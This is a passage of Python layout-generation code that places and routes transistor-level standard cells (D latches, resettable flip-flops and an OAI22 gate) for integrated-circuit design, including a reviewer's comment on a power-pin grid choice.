    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv0_o_xy[0][0], route_mem_y]), xy1=tinv0_o_xy[0], gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv1_o_xy[0][0], route_mem_y]), xy1=tinv1_o_xy[0], gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([inv0_i_xy[0][0], route_mem_y]), xy1=inv0_i_xy[0], gridname0=rg_m3m4)
    laygen.via(None, np.array([tinv0_o_xy[0][0], route_mem_y]), gridname=rg_m3m4)
    laygen.via(None, np.array([tinv1_o_xy[0][0], route_mem_y]), gridname=rg_m3m4)
    laygen.via(None, np.array([inv0_i_xy[0][0], route_mem_y]), gridname=rg_m3m4)
    #inv0 output to tinv1 input (feedback path; this M4 rect is also the O pin)
    ro0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv1_i_xy[0][0], pin_o_y]),
                     xy1=np.array([inv0_o_xy[0][0], pin_o_y]), gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv1_i_xy[0][0], pin_o_y]), xy1=tinv1_i_xy[0], gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([inv0_o_xy[0][0], pin_o_y]), xy1=inv0_o_xy[0], gridname0=rg_m3m4)
    laygen.via(None, np.array([tinv1_i_xy[0][0], pin_o_y]), gridname=rg_m3m4)
    laygen.via(None, np.array([inv0_o_xy[0][0], pin_o_y]), gridname=rg_m3m4)
    #pin creation (optional)
    if create_pin == True:
        ri0_pin_xy=laygen.get_inst_pin_xy(name="I" + objectname_pfix + 'TINV0', pinname='I', gridname=rg_m3m4)
        laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=ri0_pin_xy, gridname=rg_m3m4)
        laygen.pin(name='CLK', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = rclk0, gridname = rg_m3m4), gridname=rg_m3m4)
        laygen.pin(name='CLKB', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = rclkb0, gridname = rg_m3m4), gridname=rg_m3m4)
        laygen.pin(name='O', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = ro0, gridname = rg_m3m4), gridname=rg_m3m4)
        #power pin: VDD/VSS rects spanning from the first to the last sub-block
        rvdd0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'TINV0', 'VDD', rg_m2m3)
        rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'INV0', 'VDD', rg_m2m3)
        rvss0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'TINV0',
'VSS', rg_m2m3)
        rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'INV0', 'VSS', rg_m2m3)
        laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2)
        laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=rg_m1m2)

def generate_latch_2ck_rstbh(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4,origin=np.array([0, 0]), m=4,
                             pin_clk_y=3, pin_clkb_y=2, route_mem_y=4, pin_o_y=5, create_pin=False):
    """generate D latch (complementary clock) with resettable output stage

    Same topology as generate_latch_2ck, except the output inverter is
    replaced by a NAND (ND0): its A input takes the storage node and its
    second input becomes the reset control, so the latch output can be
    forced via that pin (exposed as RSTB when create_pin is set --
    active-low reset presumed from the name; confirm against users).

    Parameters:
        laygen: layout generator object providing place/relplace/route/via/pin
        objectname_pfix: string prefix for generated instance names
        placement_grid, routing_grid_m1m2/_m2m3/_m3m4: grid names
        origin: placement origin on the placement grid
        m: drive-strength multiplier selecting the tinv_/nand_ template size
        pin_clk_y, pin_clkb_y, route_mem_y, pin_o_y: M3/M4 grid y-tracks
            used for the CLK, CLKB, storage and output routes
        create_pin: if True, create I/CLK/CLKB/RSTB/O and VDD/VSS pins
    """
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    rg_m2m3 = routing_grid_m2m3
    rg_m3m4 = routing_grid_m3m4
    # placement: input tristate inverter, minimum-size keeper, reset NAND
    i0 = laygen.place("I"+objectname_pfix + 'TINV0', "tinv_"+str(m)+"x", pg, xy=origin)
    i1 = laygen.relplace(name = "I"+objectname_pfix + 'TINV1', templatename = "tinv_small_1x", gridname = pg, refinstname = i0.name) #used minimum size
    i2 = laygen.relplace(name = "I"+objectname_pfix + 'ND0', templatename = "nand_"+str(m)+"x", gridname = pg, refinstname = i1.name)
    # internal pins (xy on the m3m4 grid for each template pin)
    tinv0_i_xy = laygen.get_inst_pin_xy(i0.name, 'I', rg_m3m4)
    tinv0_en_xy = laygen.get_inst_pin_xy(i0.name, 'EN', rg_m3m4)
    tinv0_enb_xy = laygen.get_inst_pin_xy(i0.name, 'ENB', rg_m3m4)
    tinv0_o_xy = laygen.get_inst_pin_xy(i0.name, 'O', rg_m3m4)
    tinv1_i_xy = laygen.get_inst_pin_xy(i1.name, 'I', rg_m3m4)
    tinv1_en_xy = laygen.get_inst_pin_xy(i1.name, 'EN', rg_m3m4)
    tinv1_enb_xy = laygen.get_inst_pin_xy(i1.name, 'ENB', rg_m3m4)
    tinv1_o_xy = laygen.get_inst_pin_xy(i1.name, 'O', rg_m3m4)
    nd0_a_xy = laygen.get_inst_pin_xy(i2.name, 'A', rg_m3m4)
    nd0_b_xy = laygen.get_inst_pin_xy(i2.name, 'B', rg_m3m4)
    nd0_o_xy = laygen.get_inst_pin_xy(i2.name, 'O', rg_m3m4)
    #clk: M4 trunk to TINV0.EN and TINV1.ENB, with M3 drops and vias
    rclk0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_en_xy[0][0], pin_clk_y]),
                       xy1=np.array([tinv1_enb_xy[0][0], pin_clk_y]), gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv0_en_xy[0][0], pin_clk_y]), xy1=tinv0_en_xy[0], gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv1_enb_xy[0][0], pin_clk_y]), xy1=tinv1_enb_xy[0], gridname0=rg_m3m4)
    laygen.via(None, np.array([tinv0_en_xy[0][0], pin_clk_y]), gridname=rg_m3m4)
    laygen.via(None, np.array([tinv1_enb_xy[0][0], pin_clk_y]), gridname=rg_m3m4)
    #clkb: M4 trunk to TINV0.ENB and TINV1.EN (opposite phase on the keeper)
    rclkb0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_enb_xy[0][0], pin_clkb_y]),
                        xy1=np.array([tinv1_en_xy[0][0], pin_clkb_y]), gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv0_enb_xy[0][0], pin_clkb_y]), xy1=tinv0_enb_xy[0], gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv1_en_xy[0][0], pin_clkb_y]), xy1=tinv1_en_xy[0], gridname0=rg_m3m4)
    laygen.via(None, np.array([tinv0_enb_xy[0][0], pin_clkb_y]), gridname=rg_m3m4)
    laygen.via(None, np.array([tinv1_en_xy[0][0], pin_clkb_y]), gridname=rg_m3m4)
    #storage node: TINV0.O, TINV1.O and ND0.A tied on the route_mem_y M4 track
    laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_o_xy[0][0], route_mem_y]),
                 xy1=np.array([nd0_a_xy[0][0], route_mem_y]), gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv0_o_xy[0][0], route_mem_y]), xy1=tinv0_o_xy[0], gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv1_o_xy[0][0], route_mem_y]), xy1=tinv1_o_xy[0], gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3], xy0=np.array([nd0_a_xy[0][0], route_mem_y]), xy1=nd0_a_xy[0], gridname0=rg_m3m4)
    laygen.via(None, np.array([tinv0_o_xy[0][0], route_mem_y]), gridname=rg_m3m4)
    laygen.via(None, np.array([tinv1_o_xy[0][0], route_mem_y]), gridname=rg_m3m4)
    laygen.via(None, np.array([nd0_a_xy[0][0], route_mem_y]), gridname=rg_m3m4)
    #nd0 output to tinv1 input (feedback path; this M4 rect is also the O pin)
    ro0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv1_i_xy[0][0], pin_o_y]),
                     xy1=np.array([nd0_o_xy[0][0], pin_o_y]), gridname0=rg_m3m4)
    laygen.route(None, laygen.layers['metal'][3],
xy0=np.array([tinv1_i_xy[0][0], pin_o_y]), xy1=tinv1_i_xy[0], gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([nd0_o_xy[0][0], pin_o_y]), xy1=nd0_o_xy[0], gridname0=rg_m3m4) laygen.via(None, np.array([tinv1_i_xy[0][0], pin_o_y]), gridname=rg_m3m4) laygen.via(None, np.array([nd0_o_xy[0][0], pin_o_y]), gridname=rg_m3m4) #pin if create_pin == True: ri0_pin_xy=laygen.get_inst_pin_xy(name="I" + objectname_pfix + 'TINV0', pinname='I', gridname=rg_m3m4) laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=ri0_pin_xy, gridname=rg_m3m4) laygen.pin(name='CLK', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = rclk0, gridname = rg_m3m4), gridname=rg_m3m4) laygen.pin(name='CLKB', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = rclkb0, gridname = rg_m3m4), gridname=rg_m3m4) laygen.pin(name='RSTB', layer=laygen.layers['pin'][3], xy=nd0_b_xy, gridname=rg_m3m4) laygen.pin(name='O', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = ro0, gridname = rg_m3m4), gridname=rg_m3m4) #power pin rvdd0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'TINV0', 'VDD', rg_m2m3) rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'ND0', 'VDD', rg_m2m3) rvss0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'TINV0', 'VSS', rg_m2m3) rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'ND0', 'VSS', rg_m2m3) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=rg_m1m2) def generate_dff(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=np.array([0, 0]), m=4, create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m3m4 = routing_grid_m3m4 # placement i0 = laygen.place("I" + objectname_pfix + 'INV0', "inv_" + str(m) + "x", pg, xy=origin) i1 = 
laygen.relplace(name = "I" + objectname_pfix + 'INV1', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i0.name) org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'INV1'), gridname = pg)+ laygen.get_xy(obj = i1.template, gridname = pg) * np.array([1, 0]) generate_latch_2ck(laygen, objectname_pfix+'LCH0', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=org, m=m, pin_clk_y=3, pin_clkb_y=2, route_mem_y=4, pin_o_y=5, create_pin=False) org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'LCH0INV0'), gridname = pg)+ laygen.get_xy(obj = i1.template, gridname = pg) * np.array([1, 0]) generate_latch_2ck(laygen, objectname_pfix+'LCH1', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=org, m=m, pin_clk_y=2, pin_clkb_y=3, route_mem_y=4, pin_o_y=5, create_pin=False) #internal coordinates i0_i_xy = laygen.get_inst_pin_xy(i0.name, 'I', rg_m3m4) i0_o_xy = laygen.get_inst_pin_xy(i0.name, 'O', rg_m3m4) i1_i_xy = laygen.get_inst_pin_xy(i1.name, 'I', rg_m3m4) i1_o_xy = laygen.get_inst_pin_xy(i1.name, 'O', rg_m3m4) ilch0_i_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH0TINV0', 'I', rg_m3m4) ilch0_o_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH0INV0', 'O', rg_m3m4) ilch1_i_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH1TINV0', 'I', rg_m3m4) ilch1_ck_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH1TINV0', 'EN', rg_m3m4) ilch1_ckb_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH1TINV0', 'ENB', rg_m3m4) ilch1_o_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH1INV0', 'O', rg_m3m4) # iclkb laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i0_o_xy[0], i1_i_xy[0], 3, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i1_i_xy[0], ilch1_ckb_xy[0], 3, rg_m3m4) # iclk laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i1_o_xy[0], ilch1_ck_xy[0], 2, rg_m3m4) # intermediate 
laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ilch0_o_xy[0], ilch1_i_xy[0], 5, rg_m3m4) #pin if create_pin == True: laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=ilch0_i_xy, gridname=rg_m3m4) laygen.pin(name='CLK', layer=laygen.layers['pin'][3], xy=i0_i_xy, gridname=rg_m3m4) laygen.pin(name='O', layer=laygen.layers['pin'][3], xy=ilch1_o_xy, gridname=rg_m3m4) #power pin rvdd0_pin_xy = laygen.get_inst_pin_xy(i0.name, 'VDD', rg_m2m3) rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1INV0', 'VDD', rg_m2m3) rvss0_pin_xy = laygen.get_inst_pin_xy(i0.name, 'VSS', rg_m2m3) rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1INV0', 'VSS', rg_m2m3) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=rg_m1m2) def generate_dff_rsth(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=np.array([0, 0]), m=4, create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m3m4 = routing_grid_m3m4 # placement i0 = laygen.place("I" + objectname_pfix + 'INV0', "inv_" + str(m) + "x", pg, xy=origin) i1 = laygen.relplace(name = "I" + objectname_pfix + 'INV1', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i0.name) i2 = laygen.relplace(name = "I" + objectname_pfix + 'INV2', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i1.name) #rstb org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'INV2'), gridname = pg)+ laygen.get_xy(obj = i1.template, gridname = pg) * np.array([1, 0]) generate_latch_2ck_rstbh(laygen, objectname_pfix+'LCH0', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=org, m=m, pin_clk_y=3, pin_clkb_y=2, route_mem_y=4, pin_o_y=5, create_pin=False) 
    # slave latch: placed one LCH0ND0-template pitch to the right of the master's NAND
    org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'LCH0ND0'), gridname = pg)+ \
        laygen.get_xy(obj = laygen.get_inst('I' + objectname_pfix + 'LCH0ND0').template, gridname = pg) * np.array([1, 0])
    generate_latch_2ck_rstbh(laygen, objectname_pfix+'LCH1', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=org, m=m, pin_clk_y=2, pin_clkb_y=3, route_mem_y=4, pin_o_y=5, create_pin=False)
    #internal coordinates
    i0_i_xy = laygen.get_inst_pin_xy(i0.name, 'I', rg_m3m4)
    i0_o_xy = laygen.get_inst_pin_xy(i0.name, 'O', rg_m3m4)
    i1_i_xy = laygen.get_inst_pin_xy(i1.name, 'I', rg_m3m4)
    i1_o_xy = laygen.get_inst_pin_xy(i1.name, 'O', rg_m3m4)
    i2_i_xy = laygen.get_inst_pin_xy(i2.name, 'I', rg_m3m4)
    i2_o_xy = laygen.get_inst_pin_xy(i2.name, 'O', rg_m3m4)
    ilch0_i_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH0TINV0', 'I', rg_m3m4)
    ilch0_rstb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0ND0', 'B', rg_m3m4)
    ilch0_o_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0ND0', 'O', rg_m3m4)
    ilch1_i_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH1TINV0', 'I', rg_m3m4)
    ilch1_ck_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH1TINV0', 'EN', rg_m3m4)
    ilch1_ckb_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH1TINV0', 'ENB', rg_m3m4)
    ilch1_rstb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND0', 'B', rg_m3m4)
    ilch1_o_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND0', 'O', rg_m3m4)
    # iclkb
    laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i0_o_xy[0], i1_i_xy[0], 3, rg_m3m4)
    laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i1_i_xy[0], ilch1_ckb_xy[0], 3, rg_m3m4)
    # iclk
    laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i1_o_xy[0], ilch1_ck_xy[0], 2, rg_m3m4)
    # intermediate: master output to slave input
    laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ilch0_o_xy[0], ilch1_i_xy[0], 5, rg_m3m4)
    # rstb: buffered reset (INV2 output) fans out to both latches' RSTB (ND0.B) inputs
    laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i2_o_xy[0], ilch0_rstb_xy[0], 6, rg_m3m4)
    laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i2_o_xy[0], ilch1_rstb_xy[0], 6, rg_m3m4)
    #pin
    if create_pin == True:
        laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=ilch0_i_xy, gridname=rg_m3m4)
        laygen.pin(name='CLK', layer=laygen.layers['pin'][3], xy=i0_i_xy, gridname=rg_m3m4)
        laygen.pin(name='RST', layer=laygen.layers['pin'][3], xy=i2_i_xy, gridname=rg_m3m4)
        laygen.pin(name='O', layer=laygen.layers['pin'][3], xy=ilch1_o_xy, gridname=rg_m3m4)
        #power pin
        rvdd0_pin_xy = laygen.get_inst_pin_xy(i0.name, 'VDD', rg_m1m2)
        rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1ND0', 'VDD', rg_m1m2) #(fix this) NOTE(review): sibling generators look these up on rg_m2m3 -- confirm intended grid
        rvss0_pin_xy = laygen.get_inst_pin_xy(i0.name, 'VSS', rg_m1m2)
        rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1ND0', 'VSS', rg_m1m2)
        laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2)
        laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=rg_m1m2)

def generate_oai22_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3,
                      routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary,
                      devname_nmos_body_left, devname_nmos_body_right, devname_pmos_boundary,
                      devname_pmos_body_2stack, origin=np.array([0, 0]), create_pin=False):
    """generate a 1x OAI22 gate at transistor level.

    NMOS row (in0..in7) on the bottom; PMOS row (ip0..ip7) mirrored on top
    (transform='MX').  Gate inputs A/B/C/D are brought up to vertical m3
    stubs; the output O is an m3 strap joining the NMOS and PMOS drains.
    """
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    rg_m2m3 = routing_grid_m2m3
    rg_m1m2_pin = routing_grid_m1m2_pin
    rg_m2m3_pin = routing_grid_m2m3_pin
    # placement
    in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin)
    in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body_left, gridname = pg, refinstname = in0.name)
    in2 = laygen.relplace(name = "I"+objectname_pfix + 'N2', templatename = devname_nmos_body_right, gridname = pg, refinstname = in1.name)
    in3 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in2.name)
    in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_boundary, gridname = pg, refinstname = in3.name)
    in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_body_left, gridname = pg, refinstname = in4.name)
    in6 = laygen.relplace(name = "I"+objectname_pfix + 'N6', templatename = devname_nmos_body_right, gridname = pg, refinstname = in5.name)
    in7 = laygen.relplace(name = "I"+objectname_pfix + 'N7', templatename = devname_nmos_boundary, gridname = pg, refinstname = in6.name)
    ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX')
    ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip0.name, transform='MX')
    ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX')
    ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip3.name, transform='MX')
    ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip4.name, transform='MX')
    ip7 = laygen.relplace(name = "I"+objectname_pfix + 'P7', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip5.name, transform='MX')
    # route
    # A: m1 gate tie N1.G0-P1.G0, m2 strap, m3 stub for the pin
    laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                 refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0')
    laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m1m2)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2,
                 refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend")
    ra0 = laygen.route("R"+objectname_pfix+"A0", laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3,
                       refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0')
    laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3)
    # B: same pattern on N2.G0-P1.G1
    laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                 refinstname0=in2.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G1')
    laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m1m2)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                 refinstname0=ip1.name, refpinname0='G1', refinstname1=ip1.name, refpinname1='G1', endstyle0="extend", endstyle1="extend")
    rb0 = laygen.route("R"+objectname_pfix+"B0", laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3,
                       refinstname0=in2.name, refpinname0='G0', refinstname1=in2.name, refpinname1='G0')
    laygen.via(None, np.array([-1, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m2m3)
    # C: N5.G0-P5.G0
    laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                 refinstname0=in5.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G0')
    laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='G0', gridname=rg_m1m2)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2,
                 refinstname0=in5.name, refpinname0='G0', refinstname1=in5.name, refpinname1='G0', endstyle0="extend", endstyle1="extend")
    rc0 = laygen.route("R"+objectname_pfix+"C0", laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3,
                       refinstname0=in5.name, refpinname0='G0', refinstname1=in5.name, refpinname1='G0')
    laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='G0', gridname=rg_m2m3)
    # D: N6.G0-P5.G1
    laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                 refinstname0=in6.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G1')
    laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='G1', gridname=rg_m1m2)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                 refinstname0=ip5.name, refpinname0='G1', refinstname1=ip5.name, refpinname1='G1', endstyle0="extend", endstyle1="extend")
    rd0 = laygen.route("R"+objectname_pfix+"D0", laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3,
                       refinstname0=in6.name, refpinname0='G0', refinstname1=in6.name, refpinname1='G0')
    laygen.via(None, np.array([-1, 0]), refinstname=ip5.name, refpinname='G1', gridname=rg_m2m3)
    # PDN-internal
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                 refinstname0=in1.name, refpinname0='D0', refinstname1=in5.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]])
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m1m2,
                 refinstname0=in5.name, refpinname0='S0', refinstname1=in6.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]])
    # PUP-internal
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m1m2,
                 refinstname0=ip1.name, refpinname0='D0', refinstname1=ip5.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]])
    # output
    ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3,
                       refinstname0=in6.name, refpinname0='D0', refinstname1=ip5.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]])
    # power and ground route
    xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :]
    xy_d0 = laygen.get_template_pin_xy(in1.cellname,
'D0', rg_m1m2)[0, :]  # completes the template D0-pin lookup opened on the previous line
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstname1=in1.name)
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_d0 * np.array([1, 0]), xy1=xy_d0, gridname0=rg_m1m2, refinstname0=in2.name, refinstname1=in2.name)
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstname1=ip1.name)
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip5.name, refinstname1=ip5.name)
    laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2)
    laygen.via(None, xy_d0 * np.array([1, 0]), refinstname=in2.name, gridname=rg_m1m2)
    laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2)
    laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip5.name, gridname=rg_m1m2)
    # power and ground rail
    xy = laygen.get_xy(obj = in1.template, gridname = rg_m1m2) * np.array([1, 0])
    rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip7.name)
